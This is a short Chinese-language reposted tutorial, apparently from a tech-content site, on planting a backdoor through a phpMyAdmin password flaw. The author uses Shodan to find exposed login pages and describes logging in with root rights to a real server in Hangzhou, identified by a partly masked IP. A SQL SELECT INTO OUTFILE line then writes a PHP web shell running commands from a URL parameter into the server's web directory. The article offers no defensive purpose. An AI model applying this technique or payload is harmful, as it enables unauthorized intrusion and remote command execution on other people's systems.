使用phpMyAdmin怎么通過密碼漏洞留后門文件

發(fā)布時間：2021-06-06 08:26:10 來源：億速云閱讀：356 作者：Leah 欄目：開發(fā)技術(shù)

本篇文章給大家分享的是有關(guān)使用phpMyAdmin怎么通過密碼漏洞留后門文件，小編覺得挺實用的，因此分享給大家學(xué)習(xí)，希望大家閱讀完這篇文章后可以有所收獲，話不多說，跟著小編一起來看看吧。

經(jīng)測試，第二個漏洞在 phpMyAdmin 3.5.1 版本也是可行的。原理從略。

下面讓我們簡單的上網(wǎng)看看能不能找到一些存在這樣漏洞的登陸頁面。

祭出著名的漏洞搜索引擎 Shodan 并搜索 phpMyAdmin。

phpMyAdmin

使用phpMyAdmin怎么通過密碼漏洞留后門文件

先看看有沒有不需要密碼登陸的，逐一嘗試沒有后尋找名字中包含的版本號。這里我找到一個國內(nèi)的（浙江省·杭州市）。

使用phpMyAdmin怎么通過密碼漏洞留后門文件

地址已手動打碼。

http://121.***.*.219:80/

使用phpMyAdmin怎么通過密碼漏洞留后門文件

登陸成功（root 權(quán)限）。

使用phpMyAdmin怎么通過密碼漏洞留后門文件

接下來你可以寫一個 outfile 到對方主機的網(wǎng)絡(luò)目錄下。俗稱 “留后門”。

SELECT "<?php system($_GET[‘cmd']); ?>" into outfile "后門文件的絕對路徑"

以上就是使用phpMyAdmin怎么通過密碼漏洞留后門文件，小編相信有部分知識點可能是我們?nèi)粘９ぷ鲿姷交蛴玫降?。希望你能通過這篇文章學(xué)到更多知識。更多詳情敬請關(guān)注億速云行業(yè)資訊頻道。

向AI問一下細(xì)節(jié)

猜你喜歡